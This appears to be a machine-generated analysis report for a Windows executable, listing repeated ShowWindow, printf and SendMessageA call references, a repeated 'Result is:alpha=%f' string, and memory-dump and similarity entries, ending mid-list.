ShowWindow.USER32(00000000,00000000), ref: 00404FC0
printf.MSVCRT ref: 00404FD2
SendMessageA.USER32 ref: 00404FDF
ShowWindow.USER32(00000000,00000000), ref: 00404FE3
printf.MSVCRT ref: 00404FF5
SendMessageA.USER32 ref: 00405002
ShowWindow.USER32(00000000,00000000), ref: 00405006
printf.MSVCRT ref: 00405018
SendMessageA.USER32 ref: 00405025
ShowWindow.USER32(00000000,00000000), ref: 00405029
printf.MSVCRT ref: 0040503B
SendMessageA.USER32 ref: 00405048
ShowWindow.USER32(00000000,00000000), ref: 0040504C
printf.MSVCRT ref: 0040505E
SendMessageA.USER32 ref: 0040506B
ShowWindow.USER32(00000000,00000000), ref: 0040506F
printf.MSVCRT ref: 00405081
SendMessageA.USER32 ref: 0040508E
ShowWindow.USER32(00000000,00000000), ref: 00405092
printf.MSVCRT ref: 004050A4
SendMessageA.USER32 ref: 004050B1
ShowWindow.USER32(00000000,00000000), ref: 004050B5
printf.MSVCRT ref: 004050C7
SendMessageA.USER32 ref: 004050D4
ShowWindow.USER32(00000000,00000000), ref: 004050D8
printf.MSVCRT ref: 004050EA
SendMessageA.USER32 ref: 004050F7
ShowWindow.USER32(00000000,00000000), ref: 004050FB
printf.MSVCRT ref: 0040510D
SendMessageA.USER32 ref: 0040511A
ShowWindow.USER32(00000000,00000000), ref: 0040511E
printf.MSVCRT ref: 00405130
SendMessageA.USER32 ref: 0040513D
ShowWindow.USER32(00000000,00000000), ref: 00405141
printf.MSVCRT ref: 00405153
SendMessageA.USER32 ref: 00405160
ShowWindow.USER32(00000000,00000000), ref: 00405164
printf.MSVCRT ref: 00405176
SendMessageA.USER32 ref: 00405183
ShowWindow.USER32(00000000,00000000), ref: 00405187
printf.MSVCRT ref: 00405199
SendMessageA.USER32 ref: 004051A6
ShowWindow.USER32(00000000,00000000), ref: 004051AA
printf.MSVCRT ref: 004051BC
SendMessageA.USER32 ref: 004051C9
ShowWindow.USER32(00000000,00000000), ref: 004051CD
printf.MSVCRT ref: 004051DF
SendMessageA.USER32 ref: 004051EC
ShowWindow.USER32(00000000,00000000), ref: 004051F0
printf.MSVCRT ref: 00405202
SendMessageA.USER32 ref: 0040520F
ShowWindow.USER32(00000000,00000000), ref: 00405213
printf.MSVCRT ref: 00405225
SendMessageA.USER32 ref: 00405232
ShowWindow.USER32(00000000,00000000), ref: 00405236
printf.MSVCRT ref: 00405248
SendMessageA.USER32 ref: 00405255
ShowWindow.USER32(00000000,00000000), ref: 00405259
printf.MSVCRT ref: 0040526B
SendMessageA.USER32 ref: 00405278
ShowWindow.USER32(00000000,00000000), ref: 0040527C
printf.MSVCRT ref: 0040528E
SendMessageA.USER32 ref: 0040529B
ShowWindow.USER32(00000000,00000000), ref: 0040529F
printf.MSVCRT ref: 004052B1
SendMessageA.USER32 ref: 004052BE
ShowWindow.USER32(00000000,00000000), ref: 004052C2
printf.MSVCRT ref: 004052D4
SendMessageA.USER32 ref: 004052E1
ShowWindow.USER32(00000000,00000000), ref: 004052E5
printf.MSVCRT ref: 004052F7
SendMessageA.USER32 ref: 00405304
ShowWindow.USER32(00000000,00000000), ref: 00405308
printf.MSVCRT ref: 0040531A
SendMessageA.USER32 ref: 00405327
ShowWindow.USER32(00000000,00000000), ref: 0040532B
printf.MSVCRT ref: 0040533D
SendMessageA.USER32 ref: 0040534A
ShowWindow.USER32(00000000,00000000), ref: 0040534E
printf.MSVCRT ref: 00405360
SendMessageA.USER32 ref: 0040536D
ShowWindow.USER32(00000000,00000000), ref: 00405371
printf.MSVCRT ref: 00405383
SendMessageA.USER32 ref: 00405390
ShowWindow.USER32(00000000,00000000), ref: 00405394
printf.MSVCRT ref: 004053A6
SendMessageA.USER32 ref: 004053B3
ShowWindow.USER32(00000000,00000000), ref: 004053B7
printf.MSVCRT ref: 004053C9
SendMessageA.USER32 ref: 004053D6
ShowWindow.USER32(00000000,00000000), ref: 004053DA
printf.MSVCRT ref: 004053EC
SendMessageA.USER32 ref: 004053F9
ShowWindow.USER32(00000000,00000000), ref: 004053FD
printf.MSVCRT ref: 0040540F
SendMessageA.USER32 ref: 0040541C
ShowWindow.USER32(00000000,00000000), ref: 00405420
printf.MSVCRT ref: 00405432
SendMessageA.USER32 ref: 0040543F
ShowWindow.USER32(00000000,00000000), ref: 00405443
printf.MSVCRT ref: 00405455
SendMessageA.USER32 ref: 00405462
ShowWindow.USER32(00000000,00000000), ref: 00405466
printf.MSVCRT ref: 00405478
SendMessageA.USER32 ref: 00405485
ShowWindow.USER32(00000000,00000000), ref: 00405489
printf.MSVCRT ref: 0040549B
SendMessageA.USER32 ref: 004054A8
ShowWindow.USER32(00000000,00000000), ref: 004054AC
printf.MSVCRT ref: 004054BE
SendMessageA.USER32 ref: 004054CB
ShowWindow.USER32(00000000,00000000), ref: 004054CF
printf.MSVCRT ref: 004054E1
SendMessageA.USER32 ref: 004054EE
ShowWindow.USER32(00000000,00000000), ref: 004054F2
printf.MSVCRT ref: 00405504
SendMessageA.USER32 ref: 00405511
ShowWindow.USER32(00000000,00000000), ref: 00405515
printf.MSVCRT ref: 00405527
SendMessageA.USER32 ref: 00405534
ShowWindow.USER32(00000000,00000000), ref: 00405538
printf.MSVCRT ref: 0040554A
SendMessageA.USER32 ref: 00405557
ShowWindow.USER32(00000000,00000000), ref: 0040555B
printf.MSVCRT ref: 0040556D
SendMessageA.USER32 ref: 0040557A
ShowWindow.USER32(00000000,00000000), ref: 0040557E
printf.MSVCRT ref: 00405590
SendMessageA.USER32 ref: 0040559D
ShowWindow.USER32(00000000,00000000), ref: 004055A1
printf.MSVCRT ref: 004055B3
SendMessageA.USER32 ref: 004055C0
ShowWindow.USER32(00000000,00000000), ref: 004055C4
printf.MSVCRT ref: 004055D6
SendMessageA.USER32 ref: 004055E3
ShowWindow.USER32(00000000,00000000), ref: 004055E7
printf.MSVCRT ref: 004055F9
SendMessageA.USER32 ref: 00405606
ShowWindow.USER32(00000000,00000000), ref: 0040560A
printf.MSVCRT ref: 0040561C
SendMessageA.USER32 ref: 00405629
ShowWindow.USER32(00000000,00000000), ref: 0040562D
printf.MSVCRT ref: 0040563F
SendMessageA.USER32 ref: 0040564C
ShowWindow.USER32(00000000,00000000), ref: 00405650
printf.MSVCRT ref: 00405662
SendMessageA.USER32 ref: 0040566F
ShowWindow.USER32(00000000,00000000), ref: 00405673
printf.MSVCRT ref: 00405685
SendMessageA.USER32 ref: 00405692
ShowWindow.USER32(00000000,00000000), ref: 00405696
printf.MSVCRT ref: 004056A8
SendMessageA.USER32 ref: 004056B5
ShowWindow.USER32(00000000,00000000), ref: 004056B9
printf.MSVCRT ref: 004056CB
SendMessageA.USER32 ref: 004056D8
ShowWindow.USER32(00000000,00000000), ref: 004056DC
printf.MSVCRT ref: 004056EE
SendMessageA.USER32 ref: 004056FB
ShowWindow.USER32(00000000,00000000), ref: 004056FF
printf.MSVCRT ref: 00405711
SendMessageA.USER32 ref: 0040571E
ShowWindow.USER32(00000000,00000000), ref: 00405722
printf.MSVCRT ref: 00405734
SendMessageA.USER32 ref: 00405741
ShowWindow.USER32(00000000,00000000), ref: 00405745
printf.MSVCRT ref: 00405757
SendMessageA.USER32 ref: 00405764
ShowWindow.USER32(00000000,00000000), ref: 00405768
printf.MSVCRT ref: 0040577A
SendMessageA.USER32 ref: 00405787
ShowWindow.USER32(00000000,00000000), ref: 0040578B
printf.MSVCRT ref: 0040579D
SendMessageA.USER32 ref: 004057AA
ShowWindow.USER32(00000000,00000000), ref: 004057AE
printf.MSVCRT ref: 004057C0
SendMessageA.USER32 ref: 004057CD
ShowWindow.USER32(00000000,00000000), ref: 004057D1
printf.MSVCRT ref: 004057E3
SendMessageA.USER32 ref: 004057F0
ShowWindow.USER32(00000000,00000000), ref: 004057F4
printf.MSVCRT ref: 00405806
SendMessageA.USER32 ref: 00405813
ShowWindow.USER32(00000000,00000000), ref: 00405817
printf.MSVCRT ref: 00405829
SendMessageA.USER32 ref: 00405836
ShowWindow.USER32(00000000,00000000), ref: 0040583A
printf.MSVCRT ref: 0040584C
SendMessageA.USER32 ref: 00405859
ShowWindow.USER32(00000000,00000000), ref: 0040585D
printf.MSVCRT ref: 0040586F
SendMessageA.USER32 ref: 0040587C
ShowWindow.USER32(00000000,00000000), ref: 00405880
printf.MSVCRT ref: 00405892
SendMessageA.USER32 ref: 0040589F
ShowWindow.USER32(00000000,00000000), ref: 004058A3
printf.MSVCRT ref: 004058B5
SendMessageA.USER32 ref: 004058C2
ShowWindow.USER32(00000000,00000000), ref: 004058C6
printf.MSVCRT ref: 004058D8
SendMessageA.USER32 ref: 004058E5
ShowWindow.USER32(00000000,00000000), ref: 004058E9
printf.MSVCRT ref: 004058FB
SendMessageA.USER32 ref: 00405908
ShowWindow.USER32(00000000,00000000), ref: 0040590C
printf.MSVCRT ref: 0040591E
SendMessageA.USER32 ref: 0040592B
ShowWindow.USER32(00000000,00000000), ref: 0040592F
printf.MSVCRT ref: 00405941
SendMessageA.USER32 ref: 0040594E
ShowWindow.USER32(00000000,00000000), ref: 00405952
printf.MSVCRT ref: 00405964
SendMessageA.USER32 ref: 00405971
ShowWindow.USER32(00000000,00000000), ref: 00405975
printf.MSVCRT ref: 00405987
SendMessageA.USER32 ref: 00405994
ShowWindow.USER32(00000000,00000000), ref: 00405998
printf.MSVCRT ref: 004059AA
SendMessageA.USER32 ref: 004059B7
ShowWindow.USER32(00000000,00000000), ref: 004059BB
printf.MSVCRT ref: 004059CD
SendMessageA.USER32 ref: 004059DA
ShowWindow.USER32(00000000,00000000), ref: 004059DE
printf.MSVCRT ref: 004059F0
SendMessageA.USER32 ref: 004059FD
ShowWindow.USER32(00000000,00000000), ref: 00405A01
printf.MSVCRT ref: 00405A13
SendMessageA.USER32 ref: 00405A20
ShowWindow.USER32(00000000,00000000), ref: 00405A24
printf.MSVCRT ref: 00405A36
SendMessageA.USER32 ref: 00405A43
ShowWindow.USER32(00000000,00000000), ref: 00405A47
printf.MSVCRT ref: 00405A59
SendMessageA.USER32 ref: 00405A66
ShowWindow.USER32(00000000,00000000), ref: 00405A6A
printf.MSVCRT ref: 00405A7C
SendMessageA.USER32 ref: 00405A89
ShowWindow.USER32(00000000,00000000), ref: 00405A8D
printf.MSVCRT ref: 00405A9F
SendMessageA.USER32 ref: 00405AAC
ShowWindow.USER32(00000000,00000000), ref: 00405AB0
printf.MSVCRT ref: 00405AC2
SendMessageA.USER32 ref: 00405ACF
ShowWindow.USER32(00000000,00000000), ref: 00405AD3
printf.MSVCRT ref: 00405AE5
SendMessageA.USER32 ref: 00405AF2
ShowWindow.USER32(00000000,00000000), ref: 00405AF6
printf.MSVCRT ref: 00405B08
SendMessageA.USER32 ref: 00405B15
ShowWindow.USER32(00000000,00000000), ref: 00405B19
printf.MSVCRT ref: 00405B2B
SendMessageA.USER32 ref: 00405B38
ShowWindow.USER32(00000000,00000000), ref: 00405B3C
printf.MSVCRT ref: 00405B4E
SendMessageA.USER32 ref: 00405B5B
ShowWindow.USER32(00000000,00000000), ref: 00405B5F
printf.MSVCRT ref: 00405B71
SendMessageA.USER32 ref: 00405B7E
ShowWindow.USER32(00000000,00000000), ref: 00405B82
printf.MSVCRT ref: 00405B94
SendMessageA.USER32 ref: 00405BA1
ShowWindow.USER32(00000000,00000000), ref: 00405BA5
printf.MSVCRT ref: 00405BB7
SendMessageA.USER32 ref: 00405BC4
ShowWindow.USER32(00000000,00000000), ref: 00405BC8
printf.MSVCRT ref: 00405BDA
SendMessageA.USER32 ref: 00405BE7
ShowWindow.USER32(00000000,00000000), ref: 00405BEB
printf.MSVCRT ref: 00405BFD
SendMessageA.USER32 ref: 00405C0A
ShowWindow.USER32(00000000,00000000), ref: 00405C0E
printf.MSVCRT ref: 00405C20
SendMessageA.USER32 ref: 00405C2D
ShowWindow.USER32(00000000,00000000), ref: 00405C31

Strings

Result is:alpha=%f, xrefs: 0040593C
Result is:alpha=%f, xrefs: 00404B04
Result is:alpha=%f, xrefs: 004048F7
Result is:alpha=%f, xrefs: 00404F1E
Result is:alpha=%f, xrefs: 004053C4
Result is:alpha=%f, xrefs: 00403B4B
Result is:alpha=%f, xrefs: 00404D11
Result is:alpha=%f, xrefs: 00405752
Result is:alpha=%f, xrefs: 00404EFB
Result is:alpha=%f, xrefs: 0040540A
Result is:alpha=%f, xrefs: 00403A56
Result is:alpha=%f, xrefs: 004055AE
Result is:alpha=%f, xrefs: 004058B0
Result is:alpha=%f, xrefs: 0040509F
Result is:alpha=%f, xrefs: 00405B8F
Result is:alpha=%f, xrefs: 00404B27
Result is:alpha=%f, xrefs: 00405B6C
Result is:alpha=%f, xrefs: 0040558B
Result is:alpha=%f, xrefs: 004047DF
Result is:alpha=%f, xrefs: 00403C63
Result is:alpha=%f, xrefs: 004058F6
Result is:alpha=%f, xrefs: 00403AE2
Result is:alpha=%f, xrefs: 00403A33
Result is:alpha=%f, xrefs: 00404267
Result is:alpha=%f, xrefs: 00403BFA
Result is:alpha=%f, xrefs: 00403E2A
Result is:alpha=%f, xrefs: 004042D0
Result is:alpha=%f, xrefs: 00405982
Result is:alpha=%f, xrefs: 004043E8
Result is:alpha=%f, xrefs: 00405B49
Result is:alpha=%f, xrefs: 004044DD
Result is:alpha=%f, xrefs: 00403DC1
Result is:alpha=%f, xrefs: 00404E92
Result is:alpha=%f, xrefs: 00405194
Result is:alpha=%f, xrefs: 00403A79
Result is:alpha=%f, xrefs: 004049C9
Result is:alpha=%f, xrefs: 00404D57
Result is:alpha=%f, xrefs: 00405919
Result is:alpha=%f, xrefs: 00404BB3
Result is:alpha=%f, xrefs: 00404037
Result is:alpha=%f, xrefs: 00404E06
Result is:alpha=%f, xrefs: 00405243
Result is:alpha=%f, xrefs: 00405847
Result is:alpha=%f, xrefs: 00403B91
Result is:alpha=%f, xrefs: 004055F4
Result is:alpha=%f, xrefs: 00404172
Result is:alpha=%f, xrefs: 00405059
Result is:alpha=%f, xrefs: 004058D3
Result is:alpha=%f, xrefs: 00403C1D
Result is:alpha=%f, xrefs: 00405450
Result is:alpha=%f, xrefs: 00403CEF
Result is:alpha=%f, xrefs: 004045AF
Result is:alpha=%f, xrefs: 0040507C
Result is:alpha=%f, xrefs: 00403F1F
Result is:alpha=%f, xrefs: 004056E9
Result is:alpha=%f, xrefs: 00404CCB
Result is:alpha=%f, xrefs: 00404F87
Result is:alpha=%f, xrefs: 00403754
Result is:alpha=%f, xrefs: 00404618
Result is:alpha=%f, xrefs: 0040463B
Result is:alpha=%f, xrefs: 00403961
Result is:alpha=%f, xrefs: 004059C8
Result is:alpha=%f, xrefs: 00404799
Result is:alpha=%f, xrefs: 00405617
Result is:alpha=%f, xrefs: 004039ED
Result is:alpha=%f, xrefs: 00404221
Result is:alpha=%f, xrefs: 00404E29
Result is:alpha=%f, xrefs: 004041DB
Result is:alpha=%f, xrefs: 004048B1
Result is:alpha=%f, xrefs: 004046C7
Result is:alpha=%f, xrefs: 00403BB4
Result is:alpha=%f, xrefs: 0040570C
Result is:alpha=%f, xrefs: 00403D58
Result is:alpha=%f, xrefs: 00404C3F
Result is:alpha=%f, xrefs: 00404C1C
Result is:alpha=%f, xrefs: 00405BB2
Result is:alpha=%f, xrefs: 00404730
Result is:alpha=%f, xrefs: 0040414F
Result is:alpha=%f, xrefs: 00405A77
Result is:alpha=%f, xrefs: 004055D1
Result is:alpha=%f, xrefs: 00404014
Result is:alpha=%f, xrefs: 004039CA
Result is:alpha=%f, xrefs: 004059EB
Result is:alpha=%f, xrefs: 00405775
Result is:alpha=%f, xrefs: 00403849
Result is:alpha=%f, xrefs: 00404500
Result is:alpha=%f, xrefs: 00403ED9
Result is:alpha=%f, xrefs: 00404A55
Result is:alpha=%f, xrefs: 004043C5
Result is:alpha=%f, xrefs: 00404195
Result is:alpha=%f, xrefs: 00404753
Result is:alpha=%f, xrefs: 004041B8
Result is:alpha=%f, xrefs: 00405568
Result is:alpha=%f, xrefs: 00403C86
Result is:alpha=%f, xrefs: 00405824
Result is:alpha=%f, xrefs: 00405171
Result is:alpha=%f, xrefs: 0040488E
Result is:alpha=%f, xrefs: 0040388F
Result is:alpha=%f, xrefs: 00403E4D
Result is:alpha=%f, xrefs: 004042F3
Result is:alpha=%f, xrefs: 0040588D
Result is:alpha=%f, xrefs: 004059A5
Result is:alpha=%f, xrefs: 00405A0E
Result is:alpha=%f, xrefs: 004045D2
Result is:alpha=%f, xrefs: 00404BF9
Result is:alpha=%f, xrefs: 0040435C
Result is:alpha=%f, xrefs: 00403DE4
Result is:alpha=%f, xrefs: 00405BD5
Result is:alpha=%f, xrefs: 0040407D
Result is:alpha=%f, xrefs: 0040442E
Result is:alpha=%f, xrefs: 00404F41
Result is:alpha=%f, xrefs: 004056C6
Result is:alpha=%f, xrefs: 004052AC
Result is:alpha=%f, xrefs: 004044BA
Result is:alpha=%f, xrefs: 00404FCD
Result is:alpha=%f, xrefs: 00405B03
Result is:alpha=%f, xrefs: 0040572F
Result is:alpha=%f, xrefs: 00405A31
Result is:alpha=%f, xrefs: 00405496
Result is:alpha=%f, xrefs: 00403777
Result is:alpha=%f, xrefs: 00404848
Result is:alpha=%f, xrefs: 00404C85
Result is:alpha=%f, xrefs: 00403B28
Result is:alpha=%f, xrefs: 00403FF1
Result is:alpha=%f, xrefs: 00404BD6
Result is:alpha=%f, xrefs: 0040586A
Result is:alpha=%f, xrefs: 0040563A
Result is:alpha=%f, xrefs: 00404A78
Result is:alpha=%f, xrefs: 00405013
Result is:alpha=%f, xrefs: 00403B05
Result is:alpha=%f, xrefs: 00403A9C
Result is:alpha=%f, xrefs: 00404EB5
Result is:alpha=%f, xrefs: 00403731
Result is:alpha=%f, xrefs: 004053A1
Result is:alpha=%f, xrefs: 004051B7
Result is:alpha=%f, xrefs: 00404ED8
Result is:alpha=%f, xrefs: 00404776
Result is:alpha=%f, xrefs: 004050E5
Result is:alpha=%f, xrefs: 00403F42
Result is:alpha=%f, xrefs: 00405C1B
Result is:alpha=%f, xrefs: 00403EFC
Result is:alpha=%f, xrefs: 00405A54
Result is:alpha=%f, xrefs: 004038F8
Result is:alpha=%f, xrefs: 00404316
Result is:alpha=%f, xrefs: 004046A4
Result is:alpha=%f, xrefs: 004043A2
Result is:alpha=%f, xrefs: 00405AE0
Result is:alpha=%f, xrefs: 0040535B
Result is:alpha=%f, xrefs: 0040386C
Result is:alpha=%f, xrefs: 004051DA
Result is:alpha=%f, xrefs: 00404451
Result is:alpha=%f, xrefs: 004053E7
Result is:alpha=%f, xrefs: 004045F5
Result is:alpha=%f, xrefs: 004057BB
Result is:alpha=%f, xrefs: 00405801
Result is:alpha=%f, xrefs: 00405036
Result is:alpha=%f, xrefs: 004048D4
Result is:alpha=%f, xrefs: 00404339
Result is:alpha=%f, xrefs: 00403F65
Result is:alpha=%f, xrefs: 0040465E
Result is:alpha=%f, xrefs: 00405545
Result is:alpha=%f, xrefs: 00404E6F
Result is:alpha=%f, xrefs: 00404AE1
Result is:alpha=%f, xrefs: 0040393E
Result is:alpha=%f, xrefs: 00403D9E
Result is:alpha=%f, xrefs: 00403826
Result is:alpha=%f, xrefs: 00405289
Result is:alpha=%f, xrefs: 00404960
Result is:alpha=%f, xrefs: 00404FAA
Result is:alpha=%f, xrefs: 00405315
Result is:alpha=%f, xrefs: 00404A32
Result is:alpha=%f, xrefs: 004054B9
Result is:alpha=%f, xrefs: 00403EB6
Result is:alpha=%f, xrefs: 00403D7B
Result is:alpha=%f, xrefs: 00404569
Result is:alpha=%f, xrefs: 00404802
Result is:alpha=%f, xrefs: 00405522
Result is:alpha=%f, xrefs: 0040458C
Result is:alpha=%f, xrefs: 00404A0F
Result is:alpha=%f, xrefs: 00404A9B
Result is:alpha=%f, xrefs: 004057DE
Result is:alpha=%f, xrefs: 00404ABE
Result is:alpha=%f, xrefs: 0040565D
Result is:alpha=%f, xrefs: 00405266
Result is:alpha=%f, xrefs: 00403E07
Result is:alpha=%f, xrefs: 0040514E
Result is:alpha=%f, xrefs: 004038D5
Result is:alpha=%f, xrefs: 004049A6
Result is:alpha=%f, xrefs: 004050C2
Result is:alpha=%f, xrefs: 004040C3
Result is:alpha=%f, xrefs: 00404D9D
Result is:alpha=%f, xrefs: 00403FCE
Result is:alpha=%f, xrefs: 00404E4C
Result is:alpha=%f, xrefs: 004051FD
Result is:alpha=%f, xrefs: 00403E93
Result is:alpha=%f, xrefs: 00404F64
Result is:alpha=%f, xrefs: 0040391B
Result is:alpha=%f, xrefs: 00403ABF
Result is:alpha=%f, xrefs: 00404C62
Result is:alpha=%f, xrefs: 00404109
Result is:alpha=%f, xrefs: 00404474
Result is:alpha=%f, xrefs: 004037BD
Result is:alpha=%f, xrefs: 00404825
Result is:alpha=%f, xrefs: 0040470D
Result is:alpha=%f, xrefs: 004047BC
Result is:alpha=%f, xrefs: 004052CF
Result is:alpha=%f, xrefs: 00404B90
Result is:alpha=%f, xrefs: 00403BD7
Result is:alpha=%f, xrefs: 0040437F
Result is:alpha=%f, xrefs: 00403803
Result is:alpha=%f, xrefs: 004052F2
Result is:alpha=%f, xrefs: 0040493D
Result is:alpha=%f, xrefs: 00403CA9
Result is:alpha=%f, xrefs: 0040412C
Result is:alpha=%f, xrefs: 00404D34
Result is:alpha=%f, xrefs: 00405ABD
Result is:alpha=%f, xrefs: 004037E0
Result is:alpha=%f, xrefs: 00403FAB
Result is:alpha=%f, xrefs: 00403C40
Result is:alpha=%f, xrefs: 0040542D
Result is:alpha=%f, xrefs: 00404983
Result is:alpha=%f, xrefs: 00405B26
Result is:alpha=%f, xrefs: 0040440B
Result is:alpha=%f, xrefs: 004056A3
Result is:alpha=%f, xrefs: 00404D7A
Result is:alpha=%f, xrefs: 00404546
Result is:alpha=%f, xrefs: 004054DC
Result is:alpha=%f, xrefs: 004039A7
Result is:alpha=%f, xrefs: 00403D12
Result is:alpha=%f, xrefs: 004054FF
Result is:alpha=%f, xrefs: 004041FE
Result is:alpha=%f, xrefs: 00405A9A
Result is:alpha=%f, xrefs: 00404523
Result is:alpha=%f, xrefs: 00405BF8
Result is:alpha=%f, xrefs: 00403A10
Result is:alpha=%f, xrefs: 00404681
Result is:alpha=%f, xrefs: 00404CEE
Result is:alpha=%f, xrefs: 00405473
Result is:alpha=%f, xrefs: 00403E70
Result is:alpha=%f, xrefs: 00404DE3
Result is:alpha=%f, xrefs: 00403D35
Result is:alpha=%f, xrefs: 00404497
Result is:alpha=%f, xrefs: 0040486B
Result is:alpha=%f, xrefs: 00405798
Result is:alpha=%f, xrefs: 0040595F
Result is:alpha=%f, xrefs: 00404FF0
Result is:alpha=%f, xrefs: 00405220
Result is:alpha=%f, xrefs: 004042AD
Result is:alpha=%f, xrefs: 0040405A
Result is:alpha=%f, xrefs: 00403F88
Result is:alpha=%f, xrefs: 004049EC
Result is:alpha=%f, xrefs: 00405680
Result is:alpha=%f, xrefs: 004046EA
Result is:alpha=%f, xrefs: 00403CCC
Result is:alpha=%f, xrefs: 00404B4A
Result is:alpha=%f, xrefs: 00404DC0
Result is:alpha=%f, xrefs: 0040537E
Result is:alpha=%f, xrefs: 00405338
Result is:alpha=%f, xrefs: 00404CA8
Result is:alpha=%f, xrefs: 004040E6
Result is:alpha=%f, xrefs: 0040491A
Result is:alpha=%f, xrefs: 00405108
Result is:alpha=%f, xrefs: 00403984
Result is:alpha=%f, xrefs: 0040428A
Result is:alpha=%f, xrefs: 0040512B
Result is:alpha=%f, xrefs: 004038B2
Result is:alpha=%f, xrefs: 0040379A
Result is:alpha=%f, xrefs: 004040A0
Result is:alpha=%f, xrefs: 00403B6E
Result is:alpha=%f, xrefs: 00404B6D
Result is:alpha=%f, xrefs: 00404244

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendShowWindowprintf
String ID: Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result 